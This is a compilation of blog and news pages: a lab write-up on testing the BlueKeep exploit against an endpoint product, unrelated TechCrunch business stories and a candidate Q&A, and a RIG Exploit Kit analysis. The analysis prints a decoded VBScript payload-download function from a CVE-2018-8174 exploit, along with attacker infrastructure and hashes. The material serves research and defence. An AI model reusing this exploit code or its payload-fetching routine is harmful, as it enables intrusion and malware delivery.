Keeping your Business Protected from CVE-2019-0708 (aka Bluekeep)

Following the recent Metasploit exploit community release we’ve been busy this weekend in the lab testing the exploit against our vulnerable sandpit. You can see from the below screenshot that we were able to load the new module and successfully gain shell access on a vulnerable host in our test environment.

Following successful exploitation of the vulnerable machine (unpatched, with RDP enabled through windows firewall) we then proceeded to deploy SentinelOne.

Live Wild Exploitation

We have observed in-the-wild attempts to both identify as well as exploit vulnerable hosts.  When you couple this with the various ‘commercial’ options available (MSF, Immunity CANVAS) it becomes that much more critical that organizations continue to take action to protect themselves against this attack vector.

CVE-2019-0708 Background

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

“A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

In essence, this is a remote code execution vulnerability that affects legacy Windows operating systems, in certain situations this required no authentication. This makes the vulnerability incredibly dangerous.

On top of that, Rapid7 just announced that a community developed exploit has been made public as part of a Metasploit framework (a security testing framework) pull request.  This is in addition to an Immunity’s commercial option in CANVAS, released in July 2019.

This exploit is currently not merged into the main branch of Metasploit, however, we expect it will be in the near future. 

Vulnerable Hosts

Using BinaryEdge we can see over 1 million potentially vulnerable hosts still on the Internet, despite a patch being released in May 2019.

Using binary edge we can see over 1 million potentially vulnerable hots still on the internet, this is despite a patch being released months ago.

Note: The quantity of exposed an vulnerable hosts can vary depending on they type of scan and the services used for the query, but by all accounts the number is between ~500k and ~1.2 million.

MS Recommended Mitigations

MS Recommended Workarounds

This may come as no surprise but enable Network Level Authentication (NLA) which will prevent the exploit from working from an unauthenticated perspective.

Keeping your business protected

It is important to understand a few things about this vulnerability, the pattern and mitigations. For the machines to be vulnerable in this instance we have to have a fairly relaxed security posture/configuration on the exposed machines.

  • We must have RDP enabled without NLA (never recommended but we often see this in the wild)
  • The service must be enabled and exposed from a network perspective (we can see over 1 million vulnerable servers on the Internet at time of writing)
  • The vulnerability is known and a patch is available so we need there to be a failing in the patch management and vulnerability management process surrounding this service/asse

However with this in mind we can show how having additional protective controls can greatly enhance even a “weak” security configuration.

In our test environment we deployed SentinelOne (EDR) to the device, leaving the machine unpatched and without NLA enabled. We once again attempted to shell the device using the MSF module:

We can see here no connection was established and that SentinelOne blocked the threat. 

Watch the Demo

Here we can see the alerts in the SentinelOne console. We drill down further into the alert:

In a real scenario, we would now take further action, patching the vulnerable system, hardening the configuration and also attempt to identify the threat actor and finally we would advise. For the lab, we aren’t going to go into that level of detail (I already know who launched the attack!)

Summary

Whilst the exploit release isn’t highly mature, it can BSOD a box and requires an understanding of the target (in terms of architecture and environment e.g. hypervisor) in order to gain a shell you can still see it’s highly effective when targeted against a Windows 7 SP1 machine that has a weak security configuration. You can take a range of measures to improve the posture of the machine which may include:

  • Disable RDP if it is not required
  • Deploy a more secure configuration (e.g. enable NLA)
  • Note that if a low privileged user account is compromised it may still be possible to use this exploit to gain SYSTEM level access even if NLA is enabled
  • Only allow RDP from whitelisted admin subnets only
  • Ensure systems are patched
  • Running regular vulnerability scans of your network and endpoints is advised
  • Ensure systems have adequate protection and response capabilities (such as SentinelOne)

If you need assistance ensuring your business is protected, please don’t hesitate to get in touch. Our team of highly trained security engineers are on hand to help you protect, detect and respond to emerging threats!

A guest post by Daniel Card, Head of Cyber Security Services PSTG.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Salesforce doubles down on verticals, launches Manufacturing and Consumer Goods Clouds

As legacy industries make the migration to cloud-based digital solutions to run and grow their businesses, Salesforce is hoping that it will get a cut of the action when it comes to their IT investments. The CRM giant has been doubling down on building specialised solutions for individual industry verticals, and today, it is unveiling new business units dedicated to not one but two of them: manufacturing and consumer goods.

The Manufacturing Cloud and Consumer Goods Cloud, as the two new products are called, are the latest in a list of other vertical-specific products the company has created. Other verticals targeted to date include finance, healthcare, media, nonprofits and retail.

The idea behind Salesforce’s strategy to build industry-specific solutions is that while the CRM and sales processes that go into manufacturing and consumer goods do have some aspects in common with other industries, both also have relatively specific requirements, too, around how sales are agreed and clients are managed.

In the case of manufacturing and consumer goods, both are capital-intensive businesses where those working on the physical products might be very removed from those working on sales (not just in terms of job functions, but in terms of the software that’s used to manage each operation), or those who are in the field who are helping to distribute those goods to the people ultimately selling them.

“In the manufacturing industry, changing customer and market demands can have a devastating effect on the bottom line, so being able to understand what is happening on the ground is imperative for success,” said Cindy Bolt, SVP and GM, Salesforce Manufacturing, in a statement. “Manufacturing Cloud bridges the gap between sales and operations teams while ensuring more predictive and transparent business, so they can build deeper and more trusted relationships with their customers.”

In both the cases of manufacturing and consumer goods, Salesforce is not creating these services out of thin air: the company had already been touting solutions for both sectors as part of its bigger push into specific industries. Past acquisitions of companies like Steelbrick — a specialist in quote-to-cash solutions, a cornerstone of how manufacturing sales are made — are likely to have played a contributing role in how the new clouds were built.

With the Manufacturing Cloud, Salesforce says that it has included a feature for sales agreements that link up with a company’s ERP and forecasting software to be able to better predict demand from individual customers as well as the wider market. The services are also coming with more analytical insights by way of Einstein Analytics, and more functionality to work with channel partners. Third parties working with Salesforce on joint solutions using Marketing Cloud include Acumen Solutions, Deloitte and Rootstock.

The Consumer Goods Cloud has some parallel with the Manufacturing Cloud, in that both are targeting businesses that are by their nature and by legacy very rooted in physical goods and are therefore not easily “disrupted” by digital innovation. Indeed, despite all that we hear about the might of Amazon and e-commerce, a full 95% of products are still sold in physical stores. That system has a lot of drawbacks, not least of them being challenges with consumer goods brands having accurate control over how products are distributed and ultimately sold.

“Retail execution remains one of the most important pieces of a consumer goods brands strategy, but so much opportunity is wasted if the field rep doesn’t have the data and technology needed to make smart decisions,” said John Strain, GM and SVP, Retail and Consumer Goods at Salesforce, in a statement. “Consumer Goods Cloud provides these field reps with the tools they need to be successful on the ground while helping build both business opportunities and stronger relationships with their retail partners.”

The company, citing research from PwC, claims that of the $200 billion that’s spent in the U.S. by consumer goods companies each year on merchandising, marketing and sales efforts for in-store sales, some $100 billion of that spend is never used in the way it was originally intended. (That’s one reason so many consumer goods companies have jumped into social media: it’s a way of connecting better and more directly, at least with the customers.)

That represents a huge area to tackle for a company likes Salesforce, and the Consumer Goods Cloud is the start of that effort. The product covers software that addresses areas optimising visits to stores, improving relationships with retailers, using Einstein insights for analytics and ordering software. Partners in the effort include Accenture and PwC.

Another important thing to note here is that Salesforce’s move into the area comes as a competitive strike: Not only are there companies out there that have built products specifically for these markets — Sysco for consumer goods, and Atlatl Software for manufacturing, for example — but Salesforce has to contend with general rivals such as Microsoft and SAP also targeting the same potential customers.

As of last quarter, Sales Cloud now accounts for more than one-quarter of Salesforce’s revenues, but today’s news underscores how “sales” is becoming a more complex and nuanced topic for the company as its business continues to grow, and as cloud-based digital processes become ever more ubiquitous across all sectors beyond simply knowledge workers. As Salesforce builds out more solutions to meet every kind of enterprise’s needs, it’s likely there will be more vertical-specific tools making their way to the platform.

Walt Disney Studios partners with Microsoft Azure on cloud innovation lab

Seems like everything is going to the cloud these days, so why should movie making be left out? Today, Walt Disney Studios announced a five-year partnership with Microsoft around an innovation lab to find ways to shift content production to the Azure cloud.

The project involves the Walt Disney StudioLAB, an innovation work space where Disney personnel can experiment with moving different workflows to the cloud. The movie production software company, Avid is also involved.

The hope is that by working together, the three parties can come up with creative, cloud-based workflows that can accelerate the innovation cycle at the prestigious movie maker. Every big company is looking for ways to innovate, regardless of their core business, and Disney is no different.

As movie making involves ever greater amounts of computing resources, the cloud is a perfect model for it, allowing them to scale up and down resources as needed, whether rendering scenes or adding special effects. As Disney’s CTO Jamie Voris sees it, this could make these processes more efficient, which could help lower cost and time to production.

“Through this innovation partnership with Microsoft, we’re able to streamline many of our processes so our talented filmmakers can focus on what they do best,” Voris said in a statement. It’s the same kind of cloud value proposition that many large organizations are seeking. They want to speed time to market, while letting technology handle some of the more mundane tasks.

The partnership builds on an existing one that Microsoft already had with Avid, where the two companies have been working together to build cloud-based workflows for the film industry using Avid software solutions on Azure. Disney will add its unique requirements to the mix, and over the five years of the partnership, hopes to streamline some of its workflows in a more modern cloud context.

FOSSA scores $8.5 million Series A to help enterprise manage open-source licenses

As more enterprise developers make use of open source, it becomes increasingly important for companies to make sure that they are complying with licensing requirements. They also need to ensure the open-source bits are being updated over time for security purposes. That’s where FOSSA comes in, and today the company announced an $8.5 million Series A.

The round was led by Bain Capital Ventures, with help from Costanoa Ventures and Norwest Venture Partners. Today’s round brings the total raised to $11 million, according to the company.

Company founder and CEO Kevin Wang says that over the last 18 months, the startup has concentrated on building tools to help enterprises comply with their growing use of open source in a safe and legal way. He says that overall this increasing use of open source is great news for developers, and for these bigger companies in general. While it enables them to take advantage of all the innovation going on in the open-source community, they need to make sure they are in compliance.

“The enterprise is really early on this journey, and that’s where we come in. We provide a platform to help the enterprise manage open-source usage at scale,” Wang explained. That involves three main pieces. First it tracks all of the open-source and third-party code being used inside a company. Next, it enforces licensing and security policy, and, finally, it has a reporting component. “We automate the mass reporting and compliance for all of the housekeeping that comes from using open source at scale,” he said.

The enterprise focus is relatively new for the company. It originally launched in 2017 as a tool for developers to track individual use of open source inside their programs. Wang saw a huge opportunity inside the enterprise to apply this same kind of capability inside larger organizations, which were hungry for tools to help them comply with the myriad open-source licenses out there.

“We found that there was no tooling out there that can manage the scale and breadth across all the different enterprise use cases and all the really complex mission-critical code bases,” he said. What’s more, he found that where there were existing tools, they were vastly underutilized or didn’t provide broad enough coverage.

The company announced a $2.2 million seed round in 2017, and since then has grown from 10 to 40 employees. With today’s funding, that should increase as the company is expanding quickly. Wang reports that the startup has been tripling its revenue numbers and customer accounts year over year. The new money should help accelerate that growth and expand the product and markets it can sell into.

Ten years after Adobe bought Omniture, the deal comes into clearer focus

Ten years ago this week, Adobe acquired Omniture for $1.8 billion. At the time, Adobe was a software company selling boxed software like Dreamweaver, Flash and Photoshop to creatives. Many people were baffled by the move, not realizing that purchasing a web analytics company was really the first volley in a full company transformation to the cloud and a shift in focus from consumer to enterprise.

It would take many years for the full vision to unfold, so you can forgive people for not recognizing the implications of the acquisition at the time, but CEO Shantanu Narayen seemed to give an inkling of what he had in mind. “This is a game-changer for both Adobe and our customers. We will enable advertisers, media companies and e-tailers to realize the full value of their digital assets,” he said in a statement after the acquisition became public.

While most people thought that perhaps this move involved some sort of link between design and data, it would turn out to be more complex than that. Tony Byrne, founder and principal analyst at Real Story Group, tried to figure out the thinking behind the deal in an EContent column published a couple of months after it was announced.

“Going forward, I think the real action will continue to revolve around integrating management and metrics, less so than integrating design and metrics. And that’s why I also think that Adobe isn’t done acquiring yet,” It was pure speculation on Byrne’s part, but it proved prescient.

There’s something happening here

Daily Crunch: Salesforce launches vertical clouds

The Daily Crunch is TechCrunch’s roundup of our biggest and most important stories. If you’d like to get this delivered to your inbox every day at around 9am Pacific, you can subscribe here.

1. Salesforce doubles down on verticals, launches Manufacturing and Consumer Goods Clouds

Salesforce unveiled two new business units today as part of its strategy to build specialized solutions for specific industries.

For example, with its Manufacturing Cloud, Salesforce says it has built a way for sales agreements to link up with a company’s ERP and forecasting software, allowing for improved demand prediction.

2. Samsung’s Galaxy Tab S6 combines creative flexibility with great design

Darrell Etherington says the new Galaxy Tab S6 (with pricing starting at $649.99) expands the definition of what a tablet can be.

3. Facebook rolls out new video tools, plus Instagram and IGTV scheduling feature

The highlights include better ways to prep for and simulcast live broadcasts, ways to take better advantage of Watch Party events, new metrics to track video performance and a much-anticipated option to schedule Instagram/IGTV content for up to six months in advance.

4. Hear how to build a billion-dollar SaaS company at TechCrunch Disrupt

This year we’ll welcome three people to the Extra Crunch stage who know first-hand what it takes to join the billion-dollar club: Battery Ventures partner Neeraj Agrawal, HelloSign COO Whitney Bouck and Harness CEO Jyoti Bansal.

image001 1

5. Beekeeper raises $45M Series B to become the ‘Slack for non-desk employees’

Beekeeper has built a mobile-first communications platform for employers who need to communicate with blue-collar and service-oriented workers.

6. How to get people to open your emails

We tackle the obvious stuff that can help with low open rates, as well as bigger challenges: Let’s say 60% of your audience opens your email — how can you get the remaining 40% to open and read it too? (Extra Crunch membership required.)

7. This week’s TechCrunch podcasts

The Equity team has some thoughts on the latest WeWork drama, and how it shows that valuations are essentially meaningless. And on Original Content, we review the Netflix documentary series “The Family.”

Hear how to build a billion-dollar SaaS company at TechCrunch Disrupt

There was a time when brick-and-mortar mom and pops framed their first $1 on the wall, but in the SaaS startup the equivalent milestone is $1 billion revenue run-rate.

Salesforce is the SaaS revenue king reporting $4 billion in revenue for its most recent quarterly report, and there are many other relatively new SaaS companies, such as WorkDay, ServiceNow and Atlassian, that have broken the $1 billion barrier.

This year at TechCrunch Disrupt (tickets here!), we welcome three people to the Extra Crunch stage who know first hand what it takes to join the billion dollar club.

Neeraj Agrawal, a partner at Battery Ventures and seasoned enterprise investor, presented his growth thesis in a widely read article for TechCrunch where he outlined the key milestones for a SaaS company to reach a billion dollars.

Whitney Bouck is COO at HelloSign, a startup that was sold to Dropbox in 2018 for $230 million. Bouck was also an executive at Box, guiding their enterprise business from 2011-2015. Prior to that she was at Documentum, which exited in 2003 to EMC for $1.7 billion.

Jyoti Bansal is currently co-founder & CEO of Harness. Previously, he was founder & CEO of AppDynamics, which Cisco acquired in 2017 for $3.7 billion. Bansal is also an investor as co-founder of venture capital firm Unusual Ventures.

The goal of this panel is to help you understand the tools and strategies that go into ramping to a billion in revenue and beyond. It requires a rare combination of good idea, product-market fit, culture and commitment. It also requires figuring out how to evolve the core idea and recover from inevitable mistakes — all while selling investors on your vision.

We’re amped for this conversation, and we can’t wait to see you there! Buy tickets to Disrupt SF here at an early-bird rate!

Did you know Extra Crunch annual members get 20% off all TechCrunch event tickets? Head over here to get your annual pass, and then email extracrunch@techcrunch.com to get your 20% discount. Please note that it can take up to 24 hours to issue the discount code.

( function() {
var func = function() {
var iframe = document.getElementById(‘wpcom-iframe-661cf9b1b8f85f5aae09b8946cafadba’)
if ( iframe ) {
iframe.onload = function() {
iframe.contentWindow.postMessage( {
‘msg_type’: ‘poll_size’,
‘frame_id’: ‘wpcom-iframe-661cf9b1b8f85f5aae09b8946cafadba’
}, “https://tcprotectedembed.com” );
}
}

// Autosize iframe
var funcSizeResponse = function( e ) {

var origin = document.createElement( ‘a’ );
origin.href = e.origin;

// Verify message origin
if ( ‘tcprotectedembed.com’ !== origin.host )
return;

// Verify message is in a format we expect
if ( ‘object’ !== typeof e.data || undefined === e.data.msg_type )
return;

switch ( e.data.msg_type ) {
case ‘poll_size:response’:
var iframe = document.getElementById( e.data._request.frame_id );

if ( iframe && ” === iframe.width )
iframe.width = ‘100%’;
if ( iframe && ” === iframe.height )
iframe.height = parseInt( e.data.height );

return;
default:
return;
}
}

if ( ‘function’ === typeof window.addEventListener ) {
window.addEventListener( ‘message’, funcSizeResponse, false );
} else if ( ‘function’ === typeof window.attachEvent ) {
window.attachEvent( ‘onmessage’, funcSizeResponse );
}
}
if (document.readyState === ‘complete’) { func.apply(); /* compat for infinite scroll */ }
else if ( document.addEventListener ) { document.addEventListener( ‘DOMContentLoaded’, func, false ); }
else if ( document.attachEvent ) { document.attachEvent( ‘onreadystatechange’, func ); }
} )();

The Good, the Bad and the Ugly in Cybersecurity – Week 37

Image of The Good, The Bad & The Ugly in CyberSecurity

The Good

Good news for privacy advocates. Rising from the ashes of Mozilla’s twice reincarnated Test Pilot program is a new, privacy-centric, third attempt. First beta out of the door is a desktop extension offering the ‘Firefox Private Network’, aka a free (at least for the time being) VPN to keep your internet surfing away from prying eyes. Anything that helps protect user privacy is always a net good in our eyes.

image of firefox vpn

Following New Bedford’s lead last week, the 22 Texas local governments hit by ransomware last month have disappointed greedy hackers hoping for a $2.5 million payday. The state’s Department of Information Resources say that their coordinated Incident Response plan has been a “tremendous success” and that over half of the “impacted entities” are now operating normally. Tax payers, of course, still have to foot the bill for the state’s valiant recovery efforts, an unsavory fact that only underlines the necessity of having a solution in place to begin with that can detect and block ransomware before it gains a foothold.

The Bad

A newly-discovered Intel side-channel vulnerability allows attackers to send maliciously crafted packets to a target system and spy on encrypted SSH sessions in real-time. The vulnerability requires the victim to be running with RDMA (Remote Direct Memory Access) enabled. Dubbed ‘Network Cache Attack’, or NetCAT (not that netcat), attackers could exploit the flaw to conduct a keystroke timing analysis and predict the text being typed in the SSH session. The researchers estimate such an attack would have an 85% chance of correctly predicting the typed text. 

The Ugly

Chromebook users are being warned of a security vulnerability in the Chrome OS’ “built-in security key” feature. If you’ve never heard of it you can probably relax, but the experimental feature is supposed to act as a universal 2nd factor (U2F) security key. U2F security keys are intended to support 2FA by ensuring only someone with a particular physical device can access your accounts. Alas, Google dropped the ball on this one and it turns out that attackers that observe the signature produced by the U2F authenticator can break it to reveal the private key. With that, they could potentially sign in to users website accounts without needing access to the Chrome OS device itself.

image of chrome vulnerability alert

The vulnerability affects 70 different models of Chromebook, and users of the feature are urged to ensure they’re running Chrome OS version 75 or later (which includes an automatic firmware update). Full remediation isn’t pretty, however, and involves a number of steps, as detailed here.   


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Ten questions for 2020 presidential candidate John Delaney

In November 2020, America will go to the polls to vote in perhaps the most consequential election in a generation. The winner will lead the country amid great social, economic and ecological unrest. The 2020 election will be a referendum on both the current White House and the direction of the country at large.

Nearly 20 years into the young century, technology has become a pervasive element in all of our lives, and will continue to only grow more important. Whoever takes the oath of office in January 2021 will have to answer some difficult questions, raging from an impending climate disaster to concerns about job loss at the hands of robotics and automation.

Many of these questions are overlooked in day to day coverage of candidates and during debates. In order to better address the issues, TechCrunch staff has compiled a 10-part questionnaire across a wide range of tech-centric topics. The questions have been sent to national candidates, regardless of party. We will be publishing the answers as we receive them. Candidates are not required to answer all 10 in order for us to publish, but we will be noting which answers have been left blank.

First up is former Congressman John Delaney. Prior to being elected to Maryland’s 6th Congressional District, Delaney co-founded and led healthcare loan service Health Care Financial Partners (HCFP) and  commercial lender CapitalSource. He was elected to Congress in 2013, beating out a 10-term Republican incumbent. Rumored to be running against Maryland governor Larry Hogan for a 2018 bid, Delaney instead announced plans to run for president in 2020.

1. Which initiatives will you prioritize to limit humankind’s impact on climate and avoid potential climate catastrophe?

My $4 trillion Climate Plan will enable us to reach the goal of net zero emissions by 2050, which the IPCC says is the necessary target to avoid the worst effects of climate change. The centerpiece of my plan is a carbon-fee-and-dividend that will put a price on carbon emissions and return the money to the American people through a dividend. My plan also includes increased federal funding for renewable energy research, advanced nuclear technologies, direct air capture, a new Climate Corps program, and the construction of the Carbon Throughway, which would transport captured carbon from all over the country to the Permian Basin for reuse and permanent sequestration.

2. What is your plan to increase black and Latinx startup founders’ access to funding?

As a former entrepreneur who started two companies that went on to be publicly traded, I am a firm believer in the importance of entrepreneurship. To ensure people from all backgrounds have the support they need to start a new business, I will create nonprofit banks to serve economically distressed communities, launch a new SBIC program to help provide access to capital to minority entrepreneurs, and create a grant program to fund business incubators and accelerators at HBCUs. Additionally, I pledge to appoint an Entrepreneurship Czar who will be responsible for promoting entrepreneurship-friendly policies at all levels of government and encouraging entrepreneurship in rural and urban communities that have been left behind by venture capital investment.

3. Why do you think low-income students are underrepresented in STEM fields and how do you think the government can help fix that problem?

I think a major part of the problem is that schools serving low-income communities don’t have the resources they need to provide a quality STEM education to every student. To fix that, I have an education plan that will increase investment in STEM education and use Title I funding to eliminate the $23 billion annual funding gap between predominantly white and predominantly black school districts. To encourage students to continue their education after they graduate from high school and ensure every student learns the skills they need, my plan also provides two years of free in-state tuition and fees at a public university, community college, or technical school to everyone who completes one year of my mandatory national service program.

4. Do you plan on backing and rolling out paper-only ballots or paper-verified election machines? With many stakeholders in the private sector and the government, how do you aim to coordinate and achieve that?

Making sure that our elections are secure is vital, and I think using voting machines that create a voter-verified paper record could improve security and increase voters’ confidence in the integrity of our elections. To address other facets of the election security issue, I have proposed creating a Department of Cybersecurity to help protect our election systems, and while in Congress I introduced election security legislation to ensure that election vendors are solely owned and controlled by American citizens.

5. What, if any, federal regulation should be enacted for autonomous vehicles?

I was proud to be the founder of the Congressional Artificial Intelligence Caucus, a bipartisan group of lawmakers dedicated to understanding the impacts of advances in AI technology and educating other legislators so they have the knowledge they need to enact policies that ensure these innovations benefit Americans. We need to use the legislative process to have a real conversation involving experts and other stakeholders in order to develop a comprehensive set of regulations regarding autonomous vehicles, which should include standards that address data collection practices and other privacy issues as well as more fundamental questions about public safety.

6. How do you plan to achieve and maintain U.S. superiority in space, both in government programs and private industry?

Space exploration is tremendously important to me as a former Congressman from Maryland, the home of NASA’s Goddard Space Flight Center, major space research centers at the University of Maryland, and many companies that develop crucial aerospace technologies. As president, I will support the NASA budget and will continue to encourage innovation in the private sector.

7. Increased capital in startups founded by American entrepreneurs is a net positive, but should the U.S. allow its businesses to be part-owned by foreign governments, particularly the government of Saudi Arabia?

I am concerned that joint ventures between U.S. businesses and foreign governments, including state-owned enterprises, could facilitate the theft of intellectual property, potentially allowing foreign governments to benefit from taxpayer-funded research. We need to put in place greater protections that defend American innovation from theft.

8. Will U.S.-China technology decoupling harm or benefit U.S. innovation and why?

In general, I am in favor of international technology cooperation but in the case of China, it engages in predatory economic behavior and disregards international rules. Intellectual property theft has become a big problem for American businesses as China allows its companies to steal IP through joint ventures. In theory, U.S.-China collaboration could advance technology and innovation but without proper IP and economic protections, U.S.-China joint ventures and partnerships can be detrimental to the U.S.

9. How large a threat does automation represent to American jobs? Do you have a plan to help train low-skilled workers and otherwise offset job loss?

Automation could lead to the disruption of up to 54 million American jobs if we aren’t prepared and we don’t have the right policies. To help American workers transition to the high-tech, high-skill future economy, I am calling for a national AI strategy that will support public/private AI partnerships, develop a social contract with the communities that are negatively impacted by technology and globalization, and create updated education and job training programs that will help students and those currently in the workforce learn the skills they need.

To help provide jobs to displaced workers and drive economic growth in communities that suffer negative effects from automation, I have proposed a $2 trillion infrastructure plan that would create an infrastructure bank to facilitate state and local government investment, increase the Highway Trust Fund, create a Climate Infrastructure Fund, and create five new matching funds to support water infrastructure, school infrastructure, deferred maintenance projects, rural broadband, and infrastructure projects in disadvantaged communities in urban and rural areas. In addition, my proposed national service program will create new opportunities that allow young adults to learn new skills and gain valuable work experience. For example, my proposal includes a new national infrastructure apprenticeship program that will award a professional certificate proving mastery of particular skill sets for those who complete the program.

10. What steps will you take to restore net neutrality and assure internet users that their traffic and data are safe from manipulation by broadband providers?

I support the Save Net Neutrality Act to restore net neutrality, and I will appoint FCC commissioners who are committed to maintaining a fair and open internet. Additionally, I would work with Congress to update our digital privacy laws and regulations to protect consumers, especially children, from their data being collected without consent.

RIG Exploit Kit Chain Internals

The Zero2Hero malware course continues with Vitali Kremez explaining the RIG Exploit Kit and the infection chain internals that led to the Amadey Stealer and Clipboard Hijacker.

Summary

One of the active malware distribution vectors lately remain to be exploit kits via drive-by infections. Exploit kits (EK) have various components from landing page filtering and serving relevant browser exploit with the end goal of downloading and running various malware of choice on the victim host.

Background

Exploit kits essentially experienced their heyday in 2012-2014 from the Blackhole Exploit Kit distribution to the Angler (XXX) Exploit Kit to their eventual demise. In many cases, some of the most high-profile sophisticated exploit kits disappeared due to the significant law enforcement operations, which led to the arrest of the main developer behind Blackhole EK operating under the alias “Paunch” as well as the Lurk cybercrime group takedown with the supposed arrest of “JP Morgan” in Russia.

In 2019, exploit kits are not as popular and effective as once they were possibly due to the lack of reliable exploit providers, underground economy of browser exploits, and lack of professionalized approach to exploit development. 

The recent exploit kits are leveraging known vulnerabilities with the openly available proof of concept (POC) on various file sharing websites and platforms. 

Some of the most popular remain to be Fallout Exploit Kit and RIG Exploit Kit with the monthly subscription prices ranging from $700 USD to $2,000 USD. The majority of the exploit kit clientele are Russian-speaking cybercrime malware distributors; moreover, the exploit kit administrators themselves routinely refuse to rent the EK to the English-language speakers.

Reversing RIG Exploit Kit Infection Chain Internals Leading to “Amadey” Stealer & Clipboard Hijacker

While analyzing the latest malvertising campaign leading to the RIG Exploit Kit (RigEK) serving Amadey stealer and clipboard hijacker malware. The RigEK leverages the so-called “gate,” which is a simple website that redirects victim traffic to the eventual RigEK landing, which ultimately leads to the malware deployment.

Reverse Engineering Steps:

(1) Obtain the RigEK traffic response from Fiddler.

(2) Debug the landing page in by setting up the breakpoint function return and copying the decoded exploit payload function.

(3) Observe the full decoded VBS code from RigEK’s CVE-2018-8174 function, which is almost an exact copy of the Github. “CVE-2018-8174” page.

In this matter, CVE-2018-8174 is also known as  “Windows VBScript Engine Remote Code Execution Vulnerability.” This exploit works based on predictability of memory allocation with the use-after-free (UAF) exploitable vulnerability.

image of RIG EX Use after free

(4) Observe the additional Flash exploit served “CVE-2018-4878” compiled with the attacker path “C:UsersLAPTOPDesktopflash_exfl2;;MainExp.as” via UAF.

image of flash exploit

(5) Finally, observe the malware drop from the RigEK leveraging the exploit.

The “CVE-2018-8174” exploit allows remote code execution and transfers control to the following decoded beatified command that downloads an encoded binary, decrypts, and runs the malware.

The shortened relevant function is as follows decoded with the key cNNN9ka:

Function getegeheteegegegege()
    strString = "http://188[.]225[.]38[.]230/?REDACTED=detonator&ZqRgBa=known&DfJxlEZfMVoIe=known&gbamqKD=criticized&euxSkuKQYdMrM=already&ykPInPSwC=everyone&ffhd3s=REDACTED&LICFHL=blackmail&HZVhikQO=known&REDACTED=known&CRaWMKEIj=strategy&QhEkGOZo=criticized&REDACTED=strategy&zjpIGBzNgKtU=golfer&t4gdfgf4=REDACTED&hyrfspovuyAMY=blackmail&REDACTED=referred&REDACTED"
    linkHex =""

    For i=1 To Len(strString)
        linkHex = linkHex + Hex(Asc(Mid(strString,i,1)))

    Next

    key = "cNNN9ka"

    linkHex2 =""
    For i=1 To Len(key)
        linkHex2 = linkHex2 + Hex(Asc(Mid(key,i,1)))
    Next

    slang = "22"
    sla = "20"
    nulla = "00000000"

    str = "E"+"" ... "+ linkHex2 + slang + sla + slang + linkHex + slang + sla + slang + "A4" + slang + nulla
End Function

Credit:

@nao_sec

Indicators of Compromise (IOCs):

Amadey Stealer (SHA-256): fdf7be93b386b9ed27785f605b9de023dc71e0b1b4ac5d34c60b076043083eb7)

Clipboard Hijacker (SHA-256): 23367aa96d6969d17dfa01dde3dd9ce7436be7dbfb7c585c8ead2af926872fb7)

RigEK Gate: bitcoinsmaker[.]site 

RigEK Server Landing: 188[.]225[.]38[.]230


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security